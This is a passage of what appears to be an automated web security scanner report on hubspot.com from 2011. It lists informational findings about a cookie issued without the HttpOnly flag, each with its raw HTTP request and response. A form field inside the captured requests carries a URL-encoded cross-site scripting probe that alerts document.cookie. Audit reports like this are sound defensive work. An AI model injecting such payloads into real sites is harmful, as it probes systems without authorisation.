F2ZS9jYWJzL2ZsYXNoL3N3Zmxhc2guY2FiI3ZlcnNpb249NiwwLDQwLDAiPgo8cGFyYW0gbmFtZT0iYWxsb3dGdWxsU2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz4KPHBhcmFtIG5hbWU9ImFsbG93c2NyaXB0YWNjZXNzIiB2YWx1ZT0iYWx3YXlzIiAvPgo8cGFyYW0gbmFtZT0ic3JjIiB2YWx1ZT0iaHR0cDovL3d3dy55b3V0dWJlLmNvbS92L20wVVF1Y1dNMFp3P2ZzPTEmYW1wO2hsPWVuX1VTIiAvPgo8cGFyYW0gbmFtZT0iYWxsb3dmdWxsc2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz48ZW1iZWQgc3R5bGU9ImRpc3BsYXk6IGJsb2NrOyBtYXJnaW4tbGVmdDogYXV0bzsgbWFyZ2luLXJpZ2h0OiBhdXRvOyIgdHlwZT0iYXBwbGljYXRpb24veC1zaG9ja3dhdmUtZmxhc2giIHdpZHRoPSIyMDAiIGhlaWdodD0iMTM3IiBzcmM9Imh0dHA6Ly93d3cueW91dHViZS5jb20vdi9tMFVRdWNXTTBadz9mcz0xJmFtcDtobD1lbl9VUyIgYWxsb3dzY3JpcHRhY2Nlc3M9ImFsd2F5cyIgYWxsb3dmdWxsc2NyZWVuPSJ0cnVlIj48L2VtYmVkPgo8L29iamVjdD5kAgEPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAWwBTxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPkh1YlNwb3QgaXMgY29tbWl0dGVkIHRvIG1ha2luZyBvdXIgY3VzdG9tZXJzIHN1Y2Nlc3NmdWwgd2l0aCBpbmJvdW5kIG1hcmtldGluZy4gQnV0IEh1YlNwb3QgaXNuJ3QgcmlnaHQgZm9yIGV2ZXJ5b25lLiA8YnIgLz48YnIgLz5Zb3UgcXVhbGlmeSBmb3IgYSBIdWJTcG90IHRyaWFsIGlmOjxiciAvPjxiciAvPiA8c3Ryb25nPio8L3N0cm9uZz4gVGhlIGdvYWwgb2YgeW91ciB3ZWJzaXRlIGlzIHRvIDxzdHJvbmc%2bZ2VuZXJhdGUgbGVhZHM8L3N0cm9uZz4gZm9yIHlvdXIgYnVzaW5lc3MuPGJyIC8%2bPGJyIC8%2bIDxzdHJvbmc%2bKjwvc3Ryb25nPiBZb3Ugd2FudCB0byB0YWtlIG9uIEludGVybmV0IG1hcmtldGluZyB5b3Vyc2VsZiwgYW5kIGhhdmUgPHN0cm9uZz50aW1lIGFuZCByZXNvdXJjZXM8L3N0cm9uZz4gc2V0IGFzaWRlIGZvciB0aGlzIHB1cnBvc2UuPC9wPgo8L2Rpdj5kAgIPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAX1BDxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPjxlbT4iU2luY2Ugc3RhcnRpbmcgd2l0aCBIdWJTcG90LCA8c3Ryb25nPndlYnNpdGUgdHJhZmZpYyBoYXMgbW9yZSB0aGFuIGRvdWJsZWQgPC9zdHJvbmc%2bZnJvbSA1MDAgdmlzaXRvcnMgcGVyIG1vbnRoIHRvIG92ZXIgMTAwMCwgPHN0cm9uZz5hbmQgPC9zdHJvbmc%2bPHN0cm9uZz5JIGhhdmUgYWxyZWFkeSBnZW5lcmF0ZWQgYSBudW1iZXIgb2YgbGVhZHMgdGhhdCBwYXkgZm9yIEh1YlNwb3QgMzAgdGltZXMgb3Zlci4iIDwvc3Ryb25nPjwvZW0%2bPC9wPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTNweDsiPjxlbT4tTm9lbCBIdWVsc2VuYmVjaywgUHJlc2lkZW50LCBWb2NpbyA8L2VtPjwvcD4KPC9kaXY%2bZAIED2QWAmYPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAXIBzxoND5PcHRpbWl6ZSB5b3VyIHdlYnNpdGUgdG8gPHN0cm9uZz5nZXQgZm91bmQ8L3N0cm9uZz4gYnkgbW9yZSBwcm9zcGVjdHMgYW5kIDxzdHJvbmc%2bY29udmVydCA8L3N0cm9uZz4gbW9yZSBvZiB0aGVtIGludG8gPHN0cm9uZz5sZWFkcyBhbmQgcGF5aW5nIGN1c3RvbWVyczwvc3Ryb25nPiB3aXRoIEh1YlNwb3QncyBpbmJvdW5kICBtYXJrZXRpbmcgc29mdHdhcmUuPC9oND4KPHA%2bPHN0cm9uZz4gPGltZyBzcmM9Ii9Qb3J0YWxzLzUzL2ltYWdlcy9IdWJTcG90X1NvZnR3YXJlLnBuZyIgYm9yZGVyPSIwIiBhbHQ9Ikh1YlNwb3QgU29mdHdhcmUiIGhzcGFjZT0iMCIgdnNwYWNlPSIwIiBjbGFzcz0iYWxpZ25SaWdodCIgc3R5bGU9ImZsb2F0OiByaWdodDsiIC8%2bPGJyIC8%2bWW91ciBGcmVlIFRyaWFsIG9mIEh1YlNwb3Q6IDwvc3Ryb25nPjwvcD4KPHVsPgo8bGk%2bR2l2ZXMgeW91IHRvb2xzIHRvIDxlbT5nZXQgZm91bmQgb25saW5lPC9lbT4gYnkgbW9yZSBxdWFsaWZpZWQgdmlzaXRvcnMuPC9saT4KPGxpPlNob3dzIHlvdSBob3cgdG8gPGVtPmNvbnZlcnQgbW9yZTwvZW0%2bIHZpc2l0b3JzIGludG8gbGVhZHMuPC9saT4KPGxpPkdpdmVzIHlvdSB0b29scyB0byA8ZW0%2bY2xvc2UgdGhvc2UgbGVhZHMgZWZmaWNpZW50bHk8L2VtPi48L2xpPgo8bGk%2bUHJvdmlkZXMgYW5hbHl0aWNzIHRvIGhlbHAgeW91IG08ZW0%2bYWtlIHNtYXJ0IG1hcmtldGluZyBpbnZlc3RtZW50czwvZW0%2bLjwvbGk%2bCjwvdWw%2bCjx1bD4KPC91bD4KPHA%2bPGJyIC8%2bWW91ciBmcmVlIHRyaWFsIGdpdmVzIHlvdSBhY2Nlc3MgdG8gYWxsIG9mIEh1YlNwb3QncyB0b29scyBhbmQgY3VzdG9tZXItb25seSByZXNvdXJjZXMuPC9wPgo8cD5UaGVyZSdzIDxzdHJvbmc%2bbm8gcmlzazwvc3Ryb25nPiwgPHN0cm9uZz5ubyBvYmxpZ2F0aW9uPC9zdHJvbmc%2bLCBhbmQgPHN0cm9uZz5ubyBjcmVkaXQgY2FyZDwvc3Ryb25nPiByZXF1aXJlZC48L3A%2bZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUVZG5uOklOR0VOSU1FTlUxOl9jdGwwIKoaNbs8%2flwSOS5lpqE0UiyhZtU%3d&dnn%3aINGENIMENU1%3a_ctl0=%0d&LeadGen_ContactForm_10273_m66219submitter_user_token=a3ef224db6434804a3e24ca05d84f49f&ContactFormId=10273&LeadGen_ContactForm_10273_m66219spam_check_key=jggksnhejohgplhhsqookmjojleogkigfklmeindumpwrhjglwdiswdwrthh&LeadGen_ContactForm_10273_m66219spam_check_sig=119116116120128123117114119124117116125121117117128126124124120122119124119121114124116120118116115120121122114118123113130122125132127117119116121132113118128132113132127129117117&LeadGen_ContactForm_10273_m66219%3aFirstName=%0d&LeadGen_ContactForm_10273_m66219%3aLastName=%0d&LeadGen_ContactForm_10273_m66219%3aEmail=%0d&LeadGen_ContactForm_10273_m66219%3aPhone=%0d&LeadGen_ContactForm_10273_m66219%3aCompany=%0d&LeadGen_ContactForm_10273_m66219%3aWebsite=%0d&LeadGen_ContactForm_10273_m66219%3aB2B_vs_B2C_PRELIM__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aEmployees__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aRole__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aMarketing_Company_auto__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aBiggest_Marketing_Challenge__c=%0d16368%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e396df5a84505c6ed9&LeadGen_ContactForm_Submit_LeadGen_ContactForm_10273_m66219=Start+Your+Free+Trial+Now&ScrollTop=%0d&__dnnVariable=%0d&hsFirstVisitHidden=http%25253A%25252F%25252Fwww.hubspot.com%25252Febooks%25252Ffacebook-page-marketing-ebook-2011%25252F%25253Fsource%25253Dhspd-InsideFacebook-200x200ad-201104%257chttp%25253A%25252F%25252Fwww.insidefacebook.com%25252F%257c2011-05-15%25252012%25253A53%25253A12

Response

HTTP/1.1 200 OK
Content-Length: 2785
Content-Type: application/x-javascript
Last-Modified: Thu, 31 Mar 2011 18:09:46 GMT
Accept-Ranges: bytes
ETag: "834594d1ceefcb1:10188"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 17:00:20 GMT
Connection: close
Set-Cookie: HUBSPOT130=68228268.20480.0000; path=/

(function($){

// vAlign Plugin
$.fn.vAlign = function() {
   return this.each(function(i){
   var h = $(this).height();
var ph = $(this).parent().height();
var nh = ((ph - h) /2);

...[SNIP]...

11.107. http://www.hubspot.com/Portals/53/skins/hubspot/app/js/jcarousel.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hubspot.com
Path:	/Portals/53/skins/hubspot/app/js/jcarousel.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

HUBSPOT130=68228268.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Portals/53/skins/hubspot/app/js/jcarousel.min.js HTTP/1.1
Host: www.hubspot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hubspot.com/free-trial/Default.aspx?RewriteStatus=1&__VIEWSTATE=%2fwEPDwULLTEyNDEwNzkwMjkPZBYGZg8WAh4EVGV4dAUPPCFET0NUWVBFIGh0bWw%2bZAIBD2QWDgIBDxYCHgdWaXNpYmxlaGQCAg8WAh4HY29udGVudAVvR2V0IGEgZnJlZSB0cmlhbCBvZiB0aGUgSHViU3BvdCBpbmJvdW5kIG1hcmtldGluZyBzb2Z0d2FyZSB0byBoZWxwIGdlbmVyYXRlIG1vcmUgdmlzaXRvcnMsIGxlYWRzIGFuZCBjdXN0b21lcnMuZAIDDxYCHwJkZAIEDxYCHwIFFkNvcHlyaWdodCAoYykgMjAxMSBieSBkAgUPFgIfAgUISHViU3BvdCBkAgYPFgIfAmRkAg8PFgIfAAWoBDxsaW5rIHJlbD0iYWx0ZXJuYXRlIiB0eXBlPSJhcHBsaWNhdGlvbi9yc3MreG1sIiB0aXRsZT0iSHViU3BvdCBDb21wYW55ICZhbXA7YW1wJiN4M2I7IFByb2R1Y3QgTmV3cyBCbG9nIiBocmVmPSJodHRwJiN4M2E7JiN4MmY7JiN4MmY7d3d3Lmh1YnNwb3QuY29tJiN4MmY7Q01TJiN4MmY7VUkmI3gyZjtNb2R1bGVzJiN4MmY7Qml6QmxvZ2dlciYjeDJmO3Jzcy5hc3B4JiN4M2Y7dGFiaWQmI3gzZDs4NTc2JmFtcDttb2R1bGVpZCYjeDNkOzEwMTE2JmFtcDttYXhjb3VudCYjeDNkOzI1Ii8%2bDQo8bGluayByZWw9ImFsdGVybmF0ZSIgdHlwZT0iYXBwbGljYXRpb24vcnNzK3htbCIgdGl0bGU9Ikh1YlNwb3QgSW50ZXJuZXQgTWFya2V0aW5nIENhc2UgU3R1ZGllcyIgaHJlZj0iaHR0cCYjeDNhOyYjeDJmOyYjeDJmO3d3dy5odWJzcG90LmNvbSYjeDJmO0NNUyYjeDJmO1VJJiN4MmY7TW9kdWxlcyYjeDJmO0JpekJsb2dnZXImI3gyZjtyc3MuYXNweCYjeDNmO3RhYmlkJiN4M2Q7NTg2NjgmYW1wO21vZHVsZWlkJiN4M2Q7NDQ4ODcmYW1wO21heGNvdW50JiN4M2Q7MjUiLz4NCmQCAg9kFgICAw9kFgICAw9kFgICAQ9kFgQCAw9kFgZmD2QWAgIED2QWAmYPZBYCZg9kFgJmDxYCHwAF3AU8b2JqZWN0IHN0eWxlPSJkaXNwbGF5OiBibG9jazsgbWFyZ2luLWxlZnQ6IGF1dG87IG1hcmdpbi1yaWdodDogYXV0bzsiIGNsYXNzaWQ9ImNsc2lkOmQyN2NkYjZlLWFlNmQtMTFjZi05NmI4LTQ0NDU1MzU0MDAwMCIgd2lkdGg9IjIwMCIgaGVpZ2h0PSIxMzciIGNvZGViYXNlPSJodHRwOi8vZG93bmxvYWQubWFjcm9tZWRpYS5jb20vcHViL3Nob2Nrd2F2ZS9jYWJzL2ZsYXNoL3N3Zmxhc2guY2FiI3ZlcnNpb249NiwwLDQwLDAiPgo8cGFyYW0gbmFtZT0iYWxsb3dGdWxsU2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz4KPHBhcmFtIG5hbWU9ImFsbG93c2NyaXB0YWNjZXNzIiB2YWx1ZT0iYWx3YXlzIiAvPgo8cGFyYW0gbmFtZT0ic3JjIiB2YWx1ZT0iaHR0cDovL3d3dy55b3V0dWJlLmNvbS92L20wVVF1Y1dNMFp3P2ZzPTEmYW1wO2hsPWVuX1VTIiAvPgo8cGFyYW0gbmFtZT0iYWxsb3dmdWxsc2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz48ZW1iZWQgc3R5bGU9ImRpc3BsYXk6IGJsb2NrOyBtYXJnaW4tbGVmdDogYXV0bzsgbWFyZ2luLXJpZ2h0OiBhdXRvOyIgdHlwZT0iYXBwbGljYXRpb24veC1zaG9ja3dhdmUtZmxhc2giIHdpZHRoPSIyMDAiIGhlaWdodD0iMTM3IiBzcmM9Imh0dHA6Ly93d3cueW91dHViZS5jb20vdi9tMFVRdWNXTTBadz9mcz0xJmFtcDtobD1lbl9VUyIgYWxsb3dzY3JpcHRhY2Nlc3M9ImFsd2F5cyIgYWxsb3dmdWxsc2NyZWVuPSJ0cnVlIj48L2VtYmVkPgo8L29iamVjdD5kAgEPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAWwBTxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPkh1YlNwb3QgaXMgY29tbWl0dGVkIHRvIG1ha2luZyBvdXIgY3VzdG9tZXJzIHN1Y2Nlc3NmdWwgd2l0aCBpbmJvdW5kIG1hcmtldGluZy4gQnV0IEh1YlNwb3QgaXNuJ3QgcmlnaHQgZm9yIGV2ZXJ5b25lLiA8YnIgLz48YnIgLz5Zb3UgcXVhbGlmeSBmb3IgYSBIdWJTcG90IHRyaWFsIGlmOjxiciAvPjxiciAvPiA8c3Ryb25nPio8L3N0cm9uZz4gVGhlIGdvYWwgb2YgeW91ciB3ZWJzaXRlIGlzIHRvIDxzdHJvbmc%2bZ2VuZXJhdGUgbGVhZHM8L3N0cm9uZz4gZm9yIHlvdXIgYnVzaW5lc3MuPGJyIC8%2bPGJyIC8%2bIDxzdHJvbmc%2bKjwvc3Ryb25nPiBZb3Ugd2FudCB0byB0YWtlIG9uIEludGVybmV0IG1hcmtldGluZyB5b3Vyc2VsZiwgYW5kIGhhdmUgPHN0cm9uZz50aW1lIGFuZCByZXNvdXJjZXM8L3N0cm9uZz4gc2V0IGFzaWRlIGZvciB0aGlzIHB1cnBvc2UuPC9wPgo8L2Rpdj5kAgIPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAX1BDxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPjxlbT4iU2luY2Ugc3RhcnRpbmcgd2l0aCBIdWJTcG90LCA8c3Ryb25nPndlYnNpdGUgdHJhZmZpYyBoYXMgbW9yZSB0aGFuIGRvdWJsZWQgPC9zdHJvbmc%2bZnJvbSA1MDAgdmlzaXRvcnMgcGVyIG1vbnRoIHRvIG92ZXIgMTAwMCwgPHN0cm9uZz5hbmQgPC9zdHJvbmc%2bPHN0cm9uZz5JIGhhdmUgYWxyZWFkeSBnZW5lcmF0ZWQgYSBudW1iZXIgb2YgbGVhZHMgdGhhdCBwYXkgZm9yIEh1YlNwb3QgMzAgdGltZXMgb3Zlci4iIDwvc3Ryb25nPjwvZW0%2bPC9wPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTNweDsiPjxlbT4tTm9lbCBIdWVsc2VuYmVjaywgUHJlc2lkZW50LCBWb2NpbyA8L2VtPjwvcD4KPC9kaXY%2bZAIED2QWAmYPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAXIBzxoND5PcHRpbWl6ZSB5b3VyIHdlYnNpdGUgdG8gPHN0cm9uZz5nZXQgZm91bmQ8L3N0cm9uZz4gYnkgbW9yZSBwcm9zcGVjdHMgYW5kIDxzdHJvbmc%2bY29udmVydCA8L3N0cm9uZz4gbW9yZSBvZiB0aGVtIGludG8gPHN0cm9uZz5sZWFkcyBhbmQgcGF5aW5nIGN1c3RvbWVyczwvc3Ryb25nPiB3aXRoIEh1YlNwb3QncyBpbmJvdW5kICBtYXJrZXRpbmcgc29mdHdhcmUuPC9oND4KPHA%2bPHN0cm9uZz4gPGltZyBzcmM9Ii9Qb3J0YWxzLzUzL2ltYWdlcy9IdWJTcG90X1NvZnR3YXJlLnBuZyIgYm9yZGVyPSIwIiBhbHQ9Ikh1YlNwb3QgU29mdHdhcmUiIGhzcGFjZT0iMCIgdnNwYWNlPSIwIiBjbGFzcz0iYWxpZ25SaWdodCIgc3R5bGU9ImZsb2F0OiByaWdodDsiIC8%2bPGJyIC8%2bWW91ciBGcmVlIFRyaWFsIG9mIEh1YlNwb3Q6IDwvc3Ryb25nPjwvcD4KPHVsPgo8bGk%2bR2l2ZXMgeW91IHRvb2xzIHRvIDxlbT5nZXQgZm91bmQgb25saW5lPC9lbT4gYnkgbW9yZSBxdWFsaWZpZWQgdmlzaXRvcnMuPC9saT4KPGxpPlNob3dzIHlvdSBob3cgdG8gPGVtPmNvbnZlcnQgbW9yZTwvZW0%2bIHZpc2l0b3JzIGludG8gbGVhZHMuPC9saT4KPGxpPkdpdmVzIHlvdSB0b29scyB0byA8ZW0%2bY2xvc2UgdGhvc2UgbGVhZHMgZWZmaWNpZW50bHk8L2VtPi48L2xpPgo8bGk%2bUHJvdmlkZXMgYW5hbHl0aWNzIHRvIGhlbHAgeW91IG08ZW0%2bYWtlIHNtYXJ0IG1hcmtldGluZyBpbnZlc3RtZW50czwvZW0%2bLjwvbGk%2bCjwvdWw%2bCjx1bD4KPC91bD4KPHA%2bPGJyIC8%2bWW91ciBmcmVlIHRyaWFsIGdpdmVzIHlvdSBhY2Nlc3MgdG8gYWxsIG9mIEh1YlNwb3QncyB0b29scyBhbmQgY3VzdG9tZXItb25seSByZXNvdXJjZXMuPC9wPgo8cD5UaGVyZSdzIDxzdHJvbmc%2bbm8gcmlzazwvc3Ryb25nPiwgPHN0cm9uZz5ubyBvYmxpZ2F0aW9uPC9zdHJvbmc%2bLCBhbmQgPHN0cm9uZz5ubyBjcmVkaXQgY2FyZDwvc3Ryb25nPiByZXF1aXJlZC48L3A%2bZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUVZG5uOklOR0VOSU1FTlUxOl9jdGwwIKoaNbs8%2flwSOS5lpqE0UiyhZtU%3d&dnn%3aINGENIMENU1%3a_ctl0=%0d&LeadGen_ContactForm_10273_m66219submitter_user_token=a3ef224db6434804a3e24ca05d84f49f&ContactFormId=10273&LeadGen_ContactForm_10273_m66219spam_check_key=jggksnhejohgplhhsqookmjojleogkigfklmeindumpwrhjglwdiswdwrthh&LeadGen_ContactForm_10273_m66219spam_check_sig=119116116120128123117114119124117116125121117117128126124124120122119124119121114124116120118116115120121122114118123113130122125132127117119116121132113118128132113132127129117117&LeadGen_ContactForm_10273_m66219%3aFirstName=%0d&LeadGen_ContactForm_10273_m66219%3aLastName=%0d&LeadGen_ContactForm_10273_m66219%3aEmail=%0d&LeadGen_ContactForm_10273_m66219%3aPhone=%0d&LeadGen_ContactForm_10273_m66219%3aCompany=%0d&LeadGen_ContactForm_10273_m66219%3aWebsite=%0d&LeadGen_ContactForm_10273_m66219%3aB2B_vs_B2C_PRELIM__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aEmployees__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aRole__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aMarketing_Company_auto__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aBiggest_Marketing_Challenge__c=%0d16368%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e396df5a84505c6ed9&LeadGen_ContactForm_Submit_LeadGen_ContactForm_10273_m66219=Start+Your+Free+Trial+Now&ScrollTop=%0d&__dnnVariable=%0d&hsFirstVisitHidden=http%25253A%25252F%25252Fwww.hubspot.com%25252Febooks%25252Ffacebook-page-marketing-ebook-2011%25252F%25253Fsource%25253Dhspd-InsideFacebook-200x200ad-201104%257chttp%25253A%25252F%25252Fwww.insidefacebook.com%25252F%257c2011-05-15%25252012%25253A53%25253A12

Response

HTTP/1.1 200 OK
Content-Length: 2383
Content-Type: application/x-javascript
Last-Modified: Thu, 10 Mar 2011 03:37:31 GMT
Accept-Ranges: bytes
ETag: "4731547cd4decb1:10188"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 17:00:20 GMT
Connection: close
Set-Cookie: HUBSPOT130=68228268.20480.0000; path=/

(function($){$.fn.jCarouselLite=function(o){o=$.extend({btnPrev:null,btnNext:null,btnGo:null,mouseWheel:false,auto:null,speed:200,easing:null,vertical:false,circular:true,visible:3,start:0,scroll:1,be
...[SNIP]...

11.108. http://www.hubspot.com/Portals/53/skins/hubspot/app/js/jquery.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hubspot.com
Path:	/Portals/53/skins/hubspot/app/js/jquery.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

HUBSPOT130=68228268.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Portals/53/skins/hubspot/app/js/jquery.js HTTP/1.1
Host: www.hubspot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hubspot.com/free-trial/Default.aspx?RewriteStatus=1&__VIEWSTATE=%2fwEPDwULLTEyNDEwNzkwMjkPZBYGZg8WAh4EVGV4dAUPPCFET0NUWVBFIGh0bWw%2bZAIBD2QWDgIBDxYCHgdWaXNpYmxlaGQCAg8WAh4HY29udGVudAVvR2V0IGEgZnJlZSB0cmlhbCBvZiB0aGUgSHViU3BvdCBpbmJvdW5kIG1hcmtldGluZyBzb2Z0d2FyZSB0byBoZWxwIGdlbmVyYXRlIG1vcmUgdmlzaXRvcnMsIGxlYWRzIGFuZCBjdXN0b21lcnMuZAIDDxYCHwJkZAIEDxYCHwIFFkNvcHlyaWdodCAoYykgMjAxMSBieSBkAgUPFgIfAgUISHViU3BvdCBkAgYPFgIfAmRkAg8PFgIfAAWoBDxsaW5rIHJlbD0iYWx0ZXJuYXRlIiB0eXBlPSJhcHBsaWNhdGlvbi9yc3MreG1sIiB0aXRsZT0iSHViU3BvdCBDb21wYW55ICZhbXA7YW1wJiN4M2I7IFByb2R1Y3QgTmV3cyBCbG9nIiBocmVmPSJodHRwJiN4M2E7JiN4MmY7JiN4MmY7d3d3Lmh1YnNwb3QuY29tJiN4MmY7Q01TJiN4MmY7VUkmI3gyZjtNb2R1bGVzJiN4MmY7Qml6QmxvZ2dlciYjeDJmO3Jzcy5hc3B4JiN4M2Y7dGFiaWQmI3gzZDs4NTc2JmFtcDttb2R1bGVpZCYjeDNkOzEwMTE2JmFtcDttYXhjb3VudCYjeDNkOzI1Ii8%2bDQo8bGluayByZWw9ImFsdGVybmF0ZSIgdHlwZT0iYXBwbGljYXRpb24vcnNzK3htbCIgdGl0bGU9Ikh1YlNwb3QgSW50ZXJuZXQgTWFya2V0aW5nIENhc2UgU3R1ZGllcyIgaHJlZj0iaHR0cCYjeDNhOyYjeDJmOyYjeDJmO3d3dy5odWJzcG90LmNvbSYjeDJmO0NNUyYjeDJmO1VJJiN4MmY7TW9kdWxlcyYjeDJmO0JpekJsb2dnZXImI3gyZjtyc3MuYXNweCYjeDNmO3RhYmlkJiN4M2Q7NTg2NjgmYW1wO21vZHVsZWlkJiN4M2Q7NDQ4ODcmYW1wO21heGNvdW50JiN4M2Q7MjUiLz4NCmQCAg9kFgICAw9kFgICAw9kFgICAQ9kFgQCAw9kFgZmD2QWAgIED2QWAmYPZBYCZg9kFgJmDxYCHwAF3AU8b2JqZWN0IHN0eWxlPSJkaXNwbGF5OiBibG9jazsgbWFyZ2luLWxlZnQ6IGF1dG87IG1hcmdpbi1yaWdodDogYXV0bzsiIGNsYXNzaWQ9ImNsc2lkOmQyN2NkYjZlLWFlNmQtMTFjZi05NmI4LTQ0NDU1MzU0MDAwMCIgd2lkdGg9IjIwMCIgaGVpZ2h0PSIxMzciIGNvZGViYXNlPSJodHRwOi8vZG93bmxvYWQubWFjcm9tZWRpYS5jb20vcHViL3Nob2Nrd2F2ZS9jYWJzL2ZsYXNoL3N3Zmxhc2guY2FiI3ZlcnNpb249NiwwLDQwLDAiPgo8cGFyYW0gbmFtZT0iYWxsb3dGdWxsU2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz4KPHBhcmFtIG5hbWU9ImFsbG93c2NyaXB0YWNjZXNzIiB2YWx1ZT0iYWx3YXlzIiAvPgo8cGFyYW0gbmFtZT0ic3JjIiB2YWx1ZT0iaHR0cDovL3d3dy55b3V0dWJlLmNvbS92L20wVVF1Y1dNMFp3P2ZzPTEmYW1wO2hsPWVuX1VTIiAvPgo8cGFyYW0gbmFtZT0iYWxsb3dmdWxsc2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz48ZW1iZWQgc3R5bGU9ImRpc3BsYXk6IGJsb2NrOyBtYXJnaW4tbGVmdDogYXV0bzsgbWFyZ2luLXJpZ2h0OiBhdXRvOyIgdHlwZT0iYXBwbGljYXRpb24veC1zaG9ja3dhdmUtZmxhc2giIHdpZHRoPSIyMDAiIGhlaWdodD0iMTM3IiBzcmM9Imh0dHA6Ly93d3cueW91dHViZS5jb20vdi9tMFVRdWNXTTBadz9mcz0xJmFtcDtobD1lbl9VUyIgYWxsb3dzY3JpcHRhY2Nlc3M9ImFsd2F5cyIgYWxsb3dmdWxsc2NyZWVuPSJ0cnVlIj48L2VtYmVkPgo8L29iamVjdD5kAgEPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgI